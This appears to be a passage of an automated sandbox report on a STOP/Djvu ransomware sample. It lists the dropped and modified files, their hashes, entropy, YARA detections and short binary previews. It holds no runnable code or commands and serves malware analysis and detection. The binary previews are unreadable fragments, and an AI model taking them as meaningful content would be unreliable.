                                                                                                                          Preview:{"ram\..}.h}d.?.....+..{V.,(.|#.'j...p..?.#T..P.v........wx..]H48.b.".....6...p...r.>.U.V|.....8..3...N..B.IqA..J..1...".N.u.'..X.Q....*.....\..rk.z.<.S..P...R.g..r..E...d=....5.E......&OG...n.>iq._k.bX...t.r....v..m!g/....f...].;.*..[.Q;.8kQ..<..O.6R..G..o..S .z...y.(....&.w...D.t..'.f.(K&(.....%z[....U...&yo.G.v... !.['.!.....?0..Y..+t.....e..........D&D..n.....3...1..d.8.Ds<w<u......D.'..(..muw.}.Yi(4..[..x..Z....&O....#....(l.O!l..X+...a.V^O7.6...6]ra...m....'......z/.C.....w...T.L.8e..BY....,.RC........ROaf.... 'V!.M....]..E.W..zc...M..R./X.g^..!.Q.-`:.g2<.....%..0.k...{....*....b.Vng...O>....iS.]B..O.=../.>....%(.2.....k..[#N.{....H.0..!f0H.J.......03..5HH...JX.4M|.#.8.......+.B.M...2..%z.ayw]I...5..!m....A.U...0...s..p6d....x-......Dk.......):..-.d.P.S...e.E.....Me-.....zA.E....g..G.i...*&d.M*j%t.......mRL..{.....Pa8......&..-0.>.v8.b...tH/.fA...b.o.\N_.\.s.?mq.d.+..i.|!.>...IrD.A| .d.?@G".[r.r.9.6......-. .3.......W..PV!d..{

                                                                                                                          C:\Users\user\AppData\Local\Temp\wctE4A4.tmp

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):74525
                                                                                                                          Entropy (8bit):7.997653087868866
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:1536:scg2wh7Ye0axLxnhKW12xZxPg6d5lQgl7ffClcQU0ODdoAWYxM9kQ5UAdt:scBwhUHaf8W12xXPbR5qltODtM9kQukt
                                                                                                                          MD5:1528CC3E3F04D24BE773CEBD946E9B8C
                                                                                                                          SHA1:C75060880353E9332947B1E556735034B597147D
                                                                                                                          SHA-256:BAA3E0F6792D47FAD8F6D2D306C50134C046D7296A2F7D7A4B62C71326661553
                                                                                                                          SHA-512:E93C052572C01C129F73BAE7760F39B81A139C1371AA87E0BB9887F0B92859DC0C84DFD373C2D152999893F321D94D90FE6B7CBA0071CC9A8EA0D14C29428A7B
                                                                                                                          Malicious:false
                                                                                                                          Preview:{"ram..3..*.*.....%.i........gW......KJ7..z....(...../?.....a{.=5.e..c%....6..u."..vIv....[......(.G...B....S..G)..C.A.N.'[...i..7.......+.uWs.....w.|..:.~.R.L.H).n....@*.y/\3.gA.zy.3.........y..P-..U....I.V?*\.._..[...7.nC...B.;.#.....k!.w.~?....#35...o.....3~.Ifv."..u.....*T!'w!I.6.X.O.....C/..~.3x.%m7]d|......jk1A..U..Q.5..C...}..g..M...'...d(.....C.l.vO.UJW..PSb.!q:..:.i...a.$.sc..k......<..0.t*IQj.Wc...4-.......@.U.M......#...'..Q..?.;~..D...WB=c......n.....<.;.EC.H%n......2m..D.i..,.r..5...M]...aJ.Hj.x.L...y..nyl../.-q.$...4_......7o..3...N...R>j.mi.~X......~.W..@.;.=cVH.]..<...M>.v.....OM.NK..!.\4i.;...>..d...20.[.|`..~.@Jo......X.t..!'..u|.......hH..&~<..?.../..;....]z..0....@LS.....p".\6X|-.=.....O.[[.L.S;(..Ho....&....d.EO...)..b.-LV]t......_iT....Z.5.S.R/)....a.........|.%x.;8.~......]aD..=.....|..Wx.8S/.I.eUTF#...A..T..yD4..2.GX=...e...j..1...O..=v.@3...p.'..;..Zt.Od...aQ.y.....L........DVU....n.=.Q..s3\..;.q.F.Q..?

                                                                                                                          C:\Users\user\AppData\Local\Temp\wctEA40.tmp

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):74540
                                                                                                                          Entropy (8bit):7.997377743762606
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:1536:Rt3OzRYPrBO3lc4nF8yg+oH0HVRC45631Ek:/OzRY1yc4nyy7oH0HVRF56FEk
                                                                                                                          MD5:22B7FFAFEF865116427AA8E1B704208A
                                                                                                                          SHA1:30008894B7BF9EA2B91CD7CD2DAE82F3194A0D40
                                                                                                                          SHA-256:1CA2AE6E66B2F034FBF204539BBAFDC515D98902D016F921E364F42C9A7A23C5
                                                                                                                          SHA-512:1ED52E6705B8D743ECB7F48343A744A36765D0511C322E208BB9EB24FDD9255B714FA95041FC5345666CB732E53D9325A43E7C176C3B7D9F083D1ED53CAD5544
                                                                                                                          Malicious:false
                                                                                                                          Preview:{"ram....J.F...ie..1G....Uw..k....C/z.[..If..D.b..i..o..K....O..%.>.O.G....yx...t#.~7r)L.{..9G..N..L.....yC.>.y..3".......[..o.b.8r.3..;.j.bc.=.Xq..Bi.w..>E.[.G..... .n.Po!......+.![O ?.|....D.+.&K^.H.......V..(L.. ".@.{m.=k..4......I.....4L....9&.........].E..l....H|....n...b3..Y..qE.-R...S.0y.....Zf..+.8......<.oO.....r..=$.z..IEuC..u..7.1.6.x%...I...O.}.$..-...l.~.m....|nF.-.9..=.:r4.s.<...G...IWU...{.z.<....^V...xs....6.BI..u......c.H.%^k.c......!:..B...8..SZ.Lz .5e...Q.....U2|..B.......N..A}sQ..w.r.+......(.b%..4....N.".dX..5.s....I*a..p~.YW.......P"+<@...`\..z#~..A......V.....Y..kN..`j..L.............N........f..E..-.Jd...hT.A1xX.....J....e..J%.<....zb....^...6.N..G5..KA...V...k/.7.6;.i+.s<]A....H.?..;H.QO^.............W.D.i"\.g WIT.h......<_.....h..&K.!.*.F...o.l..N.'5...s.!....J1VL}..;.d..J.S....{..e+...2.p>...G..>..A..8..r/qgTDE..0Cd...de...7..rS..jr....R......3H.$....O..6.0../...Y.......9.A.._...B...&o"um+.X...)..._U..Z..B..,.. U`

                                                                                                                          C:\Users\user\AppData\Local\Temp\wctF411.tmp

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):74525
                                                                                                                          Entropy (8bit):7.997343302822231
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:1536:MkynpxqaCnbFIrl6oKcmm8pFDHTc4r+Rify5DZ81NNXSBqe90mhFBbhEWX1m:M5pcaCbacoxmXDHQ7rZ8HNYOx
                                                                                                                          MD5:676C74169967613BEAAE4E55B7356576
                                                                                                                          SHA1:1817E1AE055DD0A2F31E0BEE263BF160F81F7991
                                                                                                                          SHA-256:579884E611790B89A7ACE2588E0ED541366CF412A760E84A2B21666BC4119A09
                                                                                                                          SHA-512:401626E8CC195E24AF62877447B8376D590DBDB62EAE50B97C4342BF35730D26DB925F6A0C9C956D2C0C5D0B62A2996F056A0B45BACA9E6DBE720E22A8A13BDF
                                                                                                                          Malicious:false
                                                                                                                          Preview:{"ram....$z~.\.{.....s....Ee.....}.d.Iu,....a:....}.f.rJ.V.g{.mB;..x,uM.../x.2..a_.vk..)X.,..A................a...S.....0$..1..z.~^a7..,..`....(...3..r..x../v7T[!8.N.$?.*.....5.:.VYad...:.....z..Si.&.r.h.N...?.... ...5c.>.!...?.......!...]...x.}..B..1>..G....#...p7.....V.L..=OL.e}...6........R....Gl9.xT.!Y....9..;c`..6..s....,......#.l...sI.+.s*1b....3jD.......>(.<*...Y.(.b..55....@.F...3U....l.c.e,s..J\.U.............`.. [.O.[........lJ..@....3..|`...A.4..)..K..q.,.I....L.'.A...a.={.6.......s.....8...P...I..ps.....u."..."..Is.A..<..I...@....T.{.Z.Iy....*....7..(..2T.:......8...j..c....I.0.S...+.\.......[...]...5m.l=...C....v..*./...Tt....`B....5.U.kh..%......s.K.#......_.Yd &#..'VX#.&.9^...f....(....x......)a..qm..i....&w.?...&..N.,.R.9..i...*.....~.9J...)(...KW.A...X;....'u...<..p.W.....4;...../.9....g.nX.......kS{e7c.....J...c._.M...rx.k.._1Lv..^..I.v...V..,C..1..3..W...`.r..5C.).....~.D...B.v..1.t.G.O^[.3J.h.d.C....G..)n.@....b

                                                                                                                          C:\Users\user\AppData\Local\Temp\wctF86A.tmp

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:MS-DOS executable
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):42164934
                                                                                                                          Entropy (8bit):7.947662803306286
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:786432:XwQNeYDxVRrMPJy7LVV4NDDmdrZy9wOtg5gGOdjtjSNu4GIluUNj56I59E:AQcWxDMPnN+dk65gGUjku4vNjLjE
                                                                                                                          MD5:3F11CDDCA921671B0F182E67C6658425
                                                                                                                          SHA1:2CF0C4A725FB93637037BF12F505A64358E800CE
                                                                                                                          SHA-256:8318085E88234BA08A21E8E449C946C91C4C629099F69348CF6C71334BCA0F59
                                                                                                                          SHA-512:15F2D2E59FB51522A35435412978BC5CEDDCAB0E18D5D40DA60B39AC2E60A2E9F069EA93D6052DE17F9ABB432B8101A828A319C858E155D996A8396FB9A8F6D5
                                                                                                                          Malicious:false
                                                                                                                          Preview:MZ....s>....R..\....E...8..2.L...C_.kD.hK....:..............Q./..Q.mR.A......R.<.r.lA..`.^.P.@.]y...........f..;...}[..1.4....)..N.t.mZ.W...Pa........{.k..l....s...UZ_.wM..oI...N*Z...eR...@U.......WJ....@.D2.[U.yr.L.kc..8..e....{..RT.:...).Q.?..-.6.sr........%.A4.Y...i.e.e.M}b.._......H.-W.Vy{.U..=,.+.....<..}.#.0O.k....<.U..:8..9.J....c......b.. /^......*I..4..\.]A..(da.]....B`.)..q;...C?].h.ZRu..N......7.........=..#GU.4.wrH.I...`.e..p.&D.O...}..>["5Y.{k.^....T...~.*....p.0.94o.T.z.&.K.T..'.....S*.'........I....]c.c.[.0.S.>.O.w....."...K{5s..a.!......6V.......d....y.hRS...f?b.........w..q..VW..z.....2...QT~.].$&..f..?.~:co.....4.7R...f..<.H..k...l.h.;....:......,h.VA..;.....g.+..l.G..|)e.K.Ml...k:..QW&..5z..[/T.4.r......+$.M..O.........).2I[......#.48|.K.(i`....e]%..^:.f.....f..)2...4D..N...}[._.........D..c....1...C..c...z.....g.9......}...uV.l....~>...Kw#x.4j...j..PW...BP.2IP..+nF..S,.I.Y..e.t...y..E..o.. y....sg]..k.S^<...2.z

                                                                                                                          C:\Users\user\AppData\Local\Temp\wmsetup.log

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1031
                                                                                                                          Entropy (8bit):7.791444397670549
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:tarFjT3p29DMuyO3WYsKIS8Q0iprxXF+0hfoozmgv+bD:wJj929QWWZhxinF+0hf6BD
                                                                                                                          MD5:8DE5FA156277731D6ABDA92994182EA1
                                                                                                                          SHA1:357779537E3BC7A1238369B162452594543E862B
                                                                                                                          SHA-256:9318ED9E127F3AB0A97CED2968BC0BE30C86B18F75E4D5D54B78F836F22B1783
                                                                                                                          SHA-512:3F1C43F15ED595E98C3328B777294426A26CCAEA621086631D973DB0B7069B3963CBC6FD70199018146C27FF4718679CCE536CF15FE62F0A5D0BBFD4FFB4B847
                                                                                                                          Malicious:false
                                                                                                                          Preview:..[*W....`.<......).{n.....y....X......o%...<. t.....h..z?L.I54w..../a..H......h..Fs...o...ov...AD..2\g3...0o-G.<.<".?.....+.K...?."...5.\Q..y88..-\..b.i"U..........,.6.k...CWEt..%........o8..`.<....:+.(`=^5'_..7.9......6....u...I[....N.a.ju......QAL?mH,..1."....a.......'j...E.]}....I..>'.0....Gg.......'.....Z..8Sl..f..GZ.-...N.]I...6S..X..8Eh...].f8..zgvst...;SF.2.?@....t..R.I...f...Y..........C..V.=..d.g-L.?P.*.r.r..7=......o[/..(<jK..%Ue.5...e.X^p.|d.4..+Z1.:.....Z.x+.=.../6.+[K6..D.....~..5 n..{t...:.X}.5.nj...x....y...9.$[o.&.f}Z......O<..C.d{`G...Y..%..F..7.;.G<p.4.q..>.d..A..)..+.....b^....1..8A*..Sy@...>.&.h.D.W...\d......D../.O.'t.{...c...A._.O..*\.....Pd/.h}...r.k..&.o.BA."..1...'B,_....:.....IO.......W+S.f.W........!po....)..".E=v$..3&..0h....&.t...r}........U`Q.~.=..'.T..O^&...T..{.........9.....Z..k.8pH&..qG6....c..s...7<G0. .....x..U6.K..S......O..../..[.fs#"B.*....O....X.J..Wzp...phJtdHo970vyx7vwlYG00OakDR75RuJz7NXDArt1{36A698

                                                                                                                          C:\Users\user\AppData\Local\Temp\{02662522-698F-45B5-959E-0EC7B36298AD}.png

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):6130
                                                                                                                          Entropy (8bit):7.966504954439117
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:Bgkrnsac3ui3XHTvyKo49UB/mdMZeAAZHrrbekpZ17dMNlcaCgzvpPuXZbsQCNzn:BRnsaPiTqKJdMZ3OHrnpZ172NxjvpWXs
                                                                                                                          MD5:956439A2AF2EC5F8FD5CB92EC75C80A6
                                                                                                                          SHA1:6D584F6106C4EB19D07DE2BD32BD794ED2486645
                                                                                                                          SHA-256:08549B360A06A1169BD482981C1009BA7131705ED87C97B815582E8909A9F8E7
                                                                                                                          SHA-512:F3EBA9EDC5938E6244A25A470E0B0A2AD50C43A4CB399206909F1E368D9A992EAFE73FC1641A8556E316CA7C810EDEB2717FE4958B1553EE54B576C7840CF468
                                                                                                                          Malicious:false
                                                                                                                          Preview:.PNG.2K.#..Ai.....&...{..LH...../2...H..8u....8....[.....7-.....!..\T.d.."G."o(...Y."....>...........oWX..z...6P........@...|1..7..$.F0.w.....u..O[Xa...F.7.A..?.8..N...`...T...?...=....9X.d`.. :....@..?8..}y.nX..Ez...5...n.l.,..Se.\..Io.g.......^\$...Z.!H.Rf..$....@......Q....6.LL.%...a...fI....!..b\.Z...W..F.&.s1.wK..d.[m.u.v..iB....XE....Ve..\I/.S..e.(.hKC.u..x.q.....LY.5.......cJ....>N.I.|........n#..a.h.S.#..J....Y...q..$.}.fZ.v.uz.t...Dy....0.{{.~t.=]7.v.*G...0...Y.........f....ES....I.?q...J0#k:w.....(....=.3.Mt;Ji......uc.,.Y...x.....W..jt..=y..=...V .$.yqS.)8.C_.Z...4i.$Z(..J>.....m.K.zy{U}4z...\.........0....L&m....gf+[....>.He*F..3'.J+`)..>..d.1.z!.G.x..>Mj..7S.t2nW.D.u.bmXx.@.sW$.d}..Y..........3`q*.Y...9..^\BB....|. =......xY.j.e......W.c.x.0.Z...c..R..5.....A.....W|a...T..{.|3...R3.......4..Z.GK...Q....I..o_\....W./..M........a.B.@.{..0.....n...Ow....f;f.ao+.O.c...=.+....T.],....1%"6....)...s..N. .8.Z.L.j.^...........h.K.....

                                                                                                                          C:\Users\user\AppData\Local\Temp\{139BFC28-947F-45CC-9DE4-AB0FCAEF6E9F}.png

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):6130
                                                                                                                          Entropy (8bit):7.971644330675514
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:j3JRx+TXqBeUx5JdQGwLajo2cZBqBU4HJy5DYbP+DIbCYbnu6hqTBRwUamjrm:TJR6a0Ux5Jdjn/BX2EqIbCC0BRJa
                                                                                                                          MD5:A2933FA70957AF6A556505C22DDA5071
                                                                                                                          SHA1:67F0ADF5F3379F7E040B41CF7B4C05BA6D01803E
                                                                                                                          SHA-256:E65A42D1B72BDB2651D3C6C3EAAFC6BE3EC8B576C302E4C4F69C4423E56ED7EA
                                                                                                                          SHA-512:B8A92612E47263A752F00C8056298E69A7F7F3097B75623A01C3C07A846B7682B01396BB2D5ADB40C2D47DF3DED13AE801B56EA485C57349C4AE615D717964EF
                                                                                                                          Malicious:false
                                                                                                                          Preview:.PNG.~.2.Q..`.A..z[..E....R.,e.Fg..V=d..(,.T.]G.'v>B.4.)m..p.x5...."...9P...W..jaD..oC.(..>G5.....*..U.ls....H.......R.;`M..d..B....pm..O......_.k..n.^..o.h.WS.q....=.Dj-.tG.X.....>L..0.)J.. ...0o.;V..P.. #Y.*d.,.......B...p.Hv.)..whW(....d.>.....o\.P!T*H.B.U.Ta(:.....t.4)..C.WT.......9K....dp.n...i...B^(.....l.U...6|..z..S..A.._,.H ..1..B.8a.Q.]`um>....n....ohBw2K.r....~.>....p]?.{wp.p..)..d....d.Vk.`.zJP.B..f"....m.<r..K@.+.yoCs>..3$.........u.......?..h)j}#..0-.J1.Z...z_..cU.Y.b.O+e..Gzw.h>....~.K...R..m...s.:...x~.I.3.7."...A.0......e..3.Z..6h.b........H7....2..?t.L....*..4.H.XR..{l..C....^.%...'.j.U.F#..Mt....},..Z.r.H(...su.w[.....pN...6...Z.Q..7...'D.k....P.."x.../.).%V..n...O. .w]x....dFC?4.c.c...%......-...xa.@.....-.y.!m.q4....T........i.....%.5\.!..9...+,..`.8.Ku.l.Fn.=....f......LO......p..R.L..j..[.7...`z.+K..7..1..3....~.u.`KK.,.r....X.V.<,....&x....K.:3...<.QyB.....sW"....\.0...i...U.^..Z5%..2.z..z..f..t.;..]..!1+.R4!...N.6G....

                                                                                                                          C:\Users\user\AppData\Local\Temp\{5871238D-BEB9-464A-931F-701C8F0FFB10}.png

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):6130
                                                                                                                          Entropy (8bit):7.969210732176863
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:yNfKdE3Chv3OX2NPj5RmiH0qWB8vNYgl3zrgI5hKl0sBJ6sPHrsE8aWzfwT4V115:bE3Chv+X2VjrmNCi0vnql0sBFvdkwTsd
                                                                                                                          MD5:731208DB8E5F4B056A29B000B6F67974
                                                                                                                          SHA1:928F35917B1A07C1D889823F508594418CDF885A
                                                                                                                          SHA-256:D64A76C0F77E01CB468CF39E88EEF98F191CF78B08B5723A4866EB61DCDC09F6
                                                                                                                          SHA-512:083D8131E4F5B875F804B4557977951669ED7F31BB98E599688C62AF2DF34D5E28FCCD3DA1AD4762397F5C0A19905B19A7FA743CE4B896ED2FA3A900BA1B6E1D
                                                                                                                          Malicious:false
                                                                                                                          Preview:.PNG.....\).wAEV...".N|.yP<-..p....4o.....kl.p.;.76.k...A.5...../...:}*_P.....5..E.Jt....o...(..,>R...WG.,.~.......<..np....Y!6..6......v0.......l....w.#...3.O%E*.I"=./`..%.........h.C....;..Z].e._...3.e..Jg=...[..,.o.X.j.L.]+....][.l.'UXh.IU.....(...Y.(q......h.\..a.s.gWY.5...C....uY........vw.F./....x. ...6...aA.qA.f.).yo.%......."........(J..%....8.C6:*`.A..`.[..r....~...v.ZL.l9.\"Z..R.....&.._..T^k0.2.0...Y8.VB...%B....V_..F.}.>...P....eJ.Q...n....i>.fa...].~.D.A...Y.`..y..d.....~%.PX...=.V..H..r...Y|].'.....L..(5..u.#Kl.b A...U..sj..>....c#b...A.0. $].....+.Q.;....... .=.....&.z...S......a.)3.... l...."...f.3;.:.#.:g....%zn..m+.]7s.u.......A";Y...^J5..w......YETF...6p&/..mt.....g.....t.l.Ll.a[M.x.n.N..#.dgI.<i.r.Tj...2l2..+.9X0.`E......q..&C..x......SK..9S.:1.>.D.ffi....*):.~Fr.hM...=O...x..q4....8......k..8........A....7dk...Ih.y_.....n@S.g}.4.U..`r..dO.<.#......8..E.."4...CSs...Y....35..B....c...i...<..%(..l.|..K....U....,....g..!`

                                                                                                                          C:\Users\user\AppData\Local\Temp\{5F969F84-5F34-4AF8-8D36-D6D6A1668750}.png

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):6130
                                                                                                                          Entropy (8bit):7.9717368275538085
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:6N4YXcLxnenyNtSeGoQnZ9gaIGfVSPR3o+yTaUhI3TzU4x8eHETp5XaSwrrQgpr0:MQxe4tSv9YcVkR3LyTOTY4AT7lASm5m
                                                                                                                          MD5:9FC21C4960B54572B4E2C4659ACE873A
                                                                                                                          SHA1:9A4E84BFD7C56C1CD0FCD3604C8EDAFB3FDA0AEB
                                                                                                                          SHA-256:78942BBFEA6C1BF52CF16266EA334EBB6097F53E132ED7A9930DA7D17874759D
                                                                                                                          SHA-512:675032ED5C8783A737769D3D3ECFA6913293D92294A9D6978946052EACF88722B71D54696751EEB1B3350A62864ED1E70B8E58411D9613F5E51DB6E13C80F090
                                                                                                                          Malicious:false
                                                                                                                          Preview:.PNG.....w.1h.WQ.z.&..C....C.P.'G..,..R.P.rZ...a..NJq..?.V...G..v8.T.....".e...}.S..f..E....c.X.P.OB..?\l...2=..}`...P.W...Q....Qr...d.....].R.[........]$.._.RW..VQ.P7<,P..=X.d.@;.A..1.....;.z/\...u.y..t.......'_....a.=f..[...Qe...$......@[.s..1.....HvK?.0_).....;...#.i..)o..../.B.~...2.Rn,.f.:8..f.ozc..{_7.0...12.L.50.... a..H.".....G.B..........[..<.s{..6S5...%*Eo#hl.Mh^B.....a@(.'.~d..m.......5.&/.\.g+..j.N#..j^.P....a.>}....g..pJ..l'g...Az..0..G....r...I...{...#..7.(g.O... ....$;.i-].e......x;`:..c.L, ..'U..YV....."c;..i.a'..i.Os.{2.....*..#.@{4.}.....6.x..........W..R...'..h...7....omj..\.{...zJ..j...>[FD}Q...U....?...z.._.r+m.U%.Fm..q6.....F.U..D..A7.D..q....%..<..R.M..r.....1R._.b...'X....h.}.......)-ri.q.b4o.rt...5./k..~Gx.Ul.'`.....]...gQ\..1M ~.1......5]..(.g..k.]C...9.P.l...l...LB.......ma...4<.2)(V.[.E..HSk<.W._<m...8.]......i.s+.......?t(\O.>Ak..#o.......w..... .W...B...uR..N8........@6..../.]...!E{.......+>.w.o;..(1I.....

                                                                                                                          C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1150976
                                                                                                                          Entropy (8bit):6.657215273984881
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24576:ZBUIKn/vwOXGUXAjCymYZiVtElVIBT2roqnTSSxWeT/dRPOO8UWQHUq7:F0dwAYZt6C31WeTVRPOhU7Uq7
                                                                                                                          MD5:DE93E8A0692DB2C2F178270B8DA7B5D7
                                                                                                                          SHA1:21DF7A70852C9D47B3423D14005BF67A69E6FDCC
                                                                                                                          SHA-256:1CA8AD78274A829697B8381E96B914FEA1A65B5B2351F536325D2143D689426E
                                                                                                                          SHA-512:55B21170027F3E3DC2CA8F1D6678B054F270CA7D5E9AC71EEC7A4E630ED007A0DE07BCB8134431FB4A0D4C99FABF235911CC0322080920BB407748E4422B0D4A
                                                                                                                          Malicious:true
                                                                                                                          Yara Hits:
                                                                                                                          • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, Author: Joe Security
                                                                                                                          • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, Author: unknown
                                                                                                                          • Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, Author: ditekSHen
                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......(O..l...l...l....7.f......+/..*...h....9.m..../.m...a|..Q...a|7.s...a|.......&.n....8.n....#.M...l.........d...a|3.m....6.m...Richl...........PE..L...7..]............................AA............@..........................p............@....................................T...............................,...`...8............................Z..@............................................text............................... ..`.rdata..............................@..@.data...X........d..................@....rsrc...............................@..@.reloc..,...........................@..B................................................................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe:Zone.Identifier

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:modified
                                                                                                                          Size (bytes):26
                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                          Malicious:false
                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0

                                                                                                                          C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\915DEAC5D1E15E49646B8A94E04E470958C9BB89.crl

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):67138
                                                                                                                          Entropy (8bit):7.9973272342070505
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:1536:9grPcH/R4F13rHKInCfziQ0bMzSrFfghVbfm9pVjgnd0:SrUH/RQHKo85hVTmfVjgnd0
                                                                                                                          MD5:3BC7CC432D098BAAAB1CB432BA595471
                                                                                                                          SHA1:3EA72FE6B12BE5A86C42607449D3461943827C38
                                                                                                                          SHA-256:920B142174C6C27F696EB47D8A556B9DC725798E9C7ECF0EB47D92B27E070DFC
                                                                                                                          SHA-512:704BFF63F25D655B02382D11B5B04A7FC80850AAF9DC7850C4406614A3BD3B53AE3FBA01AC22EC6E990CF00BD26C152C9FD1A588D7F3A0AE5E0BF4F3C8BB9683
                                                                                                                          Malicious:true
                                                                                                                          Preview:0....[.\.g...."..S.x9..v\.t..E}s.x./;5..8?..... .l..w......L.D.s.6a..Mt......._.v..z.B.%@.L....c@..4.p..0...VD.i.}3@B...........+>...9U.rnAY..I.........B.S.96..(EhPx...g..Z. .....l.vk.H...*.sr'..Z.W..G.].Vx....e~.:.. .6cZ#..).(j...\[.?f)A..UN<.Pq3.6J8....O.\E.PQn.!.x..............<.d.._.....)...*....H......3..P..n....H.....`b[H...s.p.H'$.3.<wS+NA0W...*...%a.....)...0....?...g....].M#..rj..q%".X... ...o.z.B..X.........g...cOg.x.N...}.T.K[Q....5X...q.f..2...&.^.......H..-....b=:..y.;)z..wM.^..%..?0......h.{..;0p.t%..i....`.`.E]...+x_.0....C^...*..l#g.VMf.p......eUq...|@..;C.L....&..i.to......H.5..J`....q...fQ.:r....y!S..`....s../....um...$..-Ih.....g.......[..>`r.+e.&>03.c....t...EX...#?.YQ.<...!..=.(.i..O..?..m.G.....p...l..A.L6.E\.....9.0X].?z3.s.F.f.m.^...k..A.5...f..-*.,Gs.v._U.!...1a..m.|..-..JGu..<....n$;//+..$..(%.}.VZu.l_.Z?J7.G..9.A-.l5..A.....\......6.>...>..[)a..fJh.,.v.,..w.S....-S.0)."XS....H'X....g..A....3.9d....v....>...uh'.X

                                                                                                                          C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\DF22CF8B8C3B46C10D3D5C407561EABEB57F8181.crl

                                                                                                                          Download File
